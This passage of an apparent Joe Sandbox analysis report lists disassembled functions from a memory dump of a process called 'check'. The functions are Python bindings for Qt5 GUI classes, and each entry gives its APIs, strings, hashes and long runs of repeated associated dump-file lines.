Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?title@String@@Window@@malloc
String ID: QWindow$title$title(self) -> str
API String ID: 1843046229-1411343727
Opcode ID: 263728c87770de8d40b77ce21e1816157b75215bc321c611d0b070671c770056
Instruction ID: 4f16ff3d1653697a8953bf355d56b2afa223fe1816cb99720dca4b512c9aeeb1
Opcode Fuzzy Hash: 263728c87770de8d40b77ce21e1816157b75215bc321c611d0b070671c770056
Instruction Fuzzy Hash: 98111B75B08A4681EB00DF55E8A97AD37A4FF44BA0F954072CA5D03320DF7CD989C740

Function 00007FFD862AC210 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fileName@QTextDocumentWriter@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD862AC268

Strings

QTextDocumentWriter, xrefs: 00007FFD862AC2A7
fileName(self) -> str, xrefs: 00007FFD862AC294
fileName, xrefs: 00007FFD862AC2A0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?fileDocumentName@String@@TextWriter@@malloc
String ID: QTextDocumentWriter$fileName$fileName(self) -> str
API String ID: 3390855354-3799561845
Opcode ID: b85db52d08e7bc110081df49bd1be1a1d65f5f24c82b08a511fb80ae932bcf39
Instruction ID: a3be8c49acfff0cc5d2ca43779d26190bddcb88fc00d92eac889c15089bffa73
Opcode Fuzzy Hash: b85db52d08e7bc110081df49bd1be1a1d65f5f24c82b08a511fb80ae932bcf39
Instruction Fuzzy Hash: 15113975B08A4681EB009F65E8A87AD37A4FB48BA0F954072CA0D47320DF7CD989C340

Function 00007FFD8629E200 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?simplified@QPainterPath@@QEBA?AV1@XZ.QT5GUI ref: 00007FFD8629E258

Strings

simplified, xrefs: 00007FFD8629E290
QPainterPath, xrefs: 00007FFD8629E297
simplified(self) -> QPainterPath, xrefs: 00007FFD8629E284

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?simplified@PainterPath@@malloc
String ID: QPainterPath$simplified$simplified(self) -> QPainterPath
API String ID: 2899151435-2984711923
Opcode ID: 5ceea3317181b647be0a233bec8e1f59214bfdac58e3c1b1592c58054c96202a
Instruction ID: 4b7988c09448ccc6eef9873b973f3b474d5ebbe9c4506e4cf687636ff9f0c528
Opcode Fuzzy Hash: 5ceea3317181b647be0a233bec8e1f59214bfdac58e3c1b1592c58054c96202a
Instruction Fuzzy Hash: 93113975B08A4681EB00DF65E8A97AD33A4FF48BA0F954076CA5D03360DF7CD949C740

Function 00007FFD862A8E50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?clipPath@QPaintuserState@@QEBA?AVQPainterPath@@XZ.QT5GUI ref: 00007FFD862A8EA8

Strings

clipPath, xrefs: 00007FFD862A8EE0
QPaintEngineState, xrefs: 00007FFD862A8EE7
clipPath(self) -> QPainterPath, xrefs: 00007FFD862A8ED4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?clipuserPaintPainterPath@Path@@State@@malloc
String ID: QPaintuserState$clipPath$clipPath(self) -> QPainterPath
API String ID: 2022040233-3741275576
Opcode ID: 24a9e04742d1c1820504a7def50cdc96817af496c8fe7d5ceddd9e02d3921688
Instruction ID: 9dfb1587690c3cb367e6a0b174f8a94144a5b2097109753a80e61482719aa933
Opcode Fuzzy Hash: 24a9e04742d1c1820504a7def50cdc96817af496c8fe7d5ceddd9e02d3921688
Instruction Fuzzy Hash: EE113575B08A4681EB00AF69E8A96AD33A4FB48BA0F954076CA0D03320DF7DD949C780

Function 00007FFD86242240 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?defaultStyleSheet@QTextDocument@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFD86242298

Strings

defaultStyleSheet(self) -> str, xrefs: 00007FFD862422C4
defaultStyleSheet, xrefs: 00007FFD862422D0
QTextDocument, xrefs: 00007FFD862422D7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?defaultDocument@@Sheet@String@@StyleTextmalloc
String ID: QTextDocument$defaultStyleSheet$defaultStyleSheet(self) -> str
API String ID: 4254618507-161029952
Opcode ID: 9df8f798ab7562f3be615d0d12d6ca7c704bca34b9cce6e3eb84f48a81f7a49e
Instruction ID: 0a5b71a36e96677b4a8b09cfc66ebb67492074331022d6797ed775c922294544
Opcode Fuzzy Hash: 9df8f798ab7562f3be615d0d12d6ca7c704bca34b9cce6e3eb84f48a81f7a49e
Instruction Fuzzy Hash: ED112976B08A5681EB00EF65E8A97AD37A4FF48BA0F954072CA5D47360DF7CD949C380

Function 00007FFD86262E40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?dashPattern@QPen@@QEBA?AV?$QVector@N@@XZ.QT5GUI ref: 00007FFD86262E98

Strings

dashPattern, xrefs: 00007FFD86262ED0
QPen, xrefs: 00007FFD86262ED7
dashPattern(self) -> List[float], xrefs: 00007FFD86262EC4

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?dashPattern@Pen@@Vector@malloc
String ID: QPen$dashPattern$dashPattern(self) -> List[float]
API String ID: 2909032917-2151970670
Opcode ID: dbaa45f6d73eaa79760fb89fd8d2ac7cecf9bd718012ccec8d6298abf9e50ba9
Instruction ID: 504f252ba86405c6a5bf51bdcc8270d04fd346872e6db1c9821d5ab9445764b4
Opcode Fuzzy Hash: dbaa45f6d73eaa79760fb89fd8d2ac7cecf9bd718012ccec8d6298abf9e50ba9
Instruction Fuzzy Hash: D3111B75B08A4681EB00EF65E8697AD33A4FB44BA0F954076CA4D43320DF7CE949C740

Function 00007FFD86296220 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?icon@QStandardItem@@QEBA?AVQIcon@@XZ.QT5GUI ref: 00007FFD86296278

Strings

icon(self) -> QIcon, xrefs: 00007FFD862962A4
QStandardItem, xrefs: 00007FFD862962B7
icon, xrefs: 00007FFD862962B0

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?icon@Icon@@Item@@Standardmalloc
String ID: QStandardItem$icon$icon(self) -> QIcon
API String ID: 1574930559-467514983
Opcode ID: 95576b3b35caaa0fd2539e0f01ec06ec704e86cdc2b11924745a96b0f73c3b44
Instruction ID: 290cba88449ac13c712f8543dd4f6fb73de912ce6ee910e72d83d3531dd9a5b6
Opcode Fuzzy Hash: 95576b3b35caaa0fd2539e0f01ec06ec704e86cdc2b11924745a96b0f73c3b44
Instruction Fuzzy Hash: 15110975B08A5681EB00AF55E8697AD37A4FF94BA0F954072CA5D03720DF7CD949C740

Function 00007FFD8628CEB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8628CF03

Strings

isLineTo, xrefs: 00007FFD8628CF22
Element, xrefs: 00007FFD8628CF29
isLineTo(self) -> bool, xrefs: 00007FFD8628CF16

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: Element$isLineTo$isLineTo(self) -> bool
API String ID: 2610644205-3155635975
Opcode ID: d94bda0504eec573a8f3e42358790f9efc893f54829fc638704f48eab15dd527
Instruction ID: d416e0906d959e0bd95c87ad8a3d8c8b92a2a63ae0273fd8471857f60e838bbc
Opcode Fuzzy Hash: d94bda0504eec573a8f3e42358790f9efc893f54829fc638704f48eab15dd527
Instruction Fuzzy Hash: BC012176B08B4AC2EB00DF65E8984AD73A4FB54B65F950476CA5D43320DF78D999C340

Function 00007FFD86262EF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD86262F4E

Strings

red8, xrefs: 00007FFD86262F6C
red8(self) -> int, xrefs: 00007FFD86262F60
QRgba64, xrefs: 00007FFD86262F73

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QRgba64$red8$red8(self) -> int
API String ID: 3417993445-1740962
Opcode ID: bf28c67527b295ecaf4eedfd77b3459aa05512b21dbbc702a1086c7e97d9b006
Instruction ID: 8235993b04edaa52ebe2375ed4d210a4c30a57d5dea954785490a68754701ef2
Opcode Fuzzy Hash: bf28c67527b295ecaf4eedfd77b3459aa05512b21dbbc702a1086c7e97d9b006
Instruction Fuzzy Hash: 86019E71B08A8AC1DB009F64E8AC6BC37A4FB44B65F954136DA5D43360DF7CD95AC380

Function 00007FFD86252EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setGamma@QPictureIO@@QEAAXM@Z.QT5GUI ref: 00007FFD86252F09

Strings

setGamma, xrefs: 00007FFD86252F38
QPictureIO, xrefs: 00007FFD86252F3F
setGamma(self, a0: float), xrefs: 00007FFD86252F2C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setGamma@Picture
String ID: QPictureIO$setGamma$setGamma(self, a0: float)
API String ID: 2828317752-2048741927
Opcode ID: b9dbfe821308f8fd8c5916e9c6fbb36277d29528c2aaa982a3327eb5006a9506
Instruction ID: 7c8dda32f2763880aa4d9be85cda33382f790ebc92d2936f695ff0520f30a596
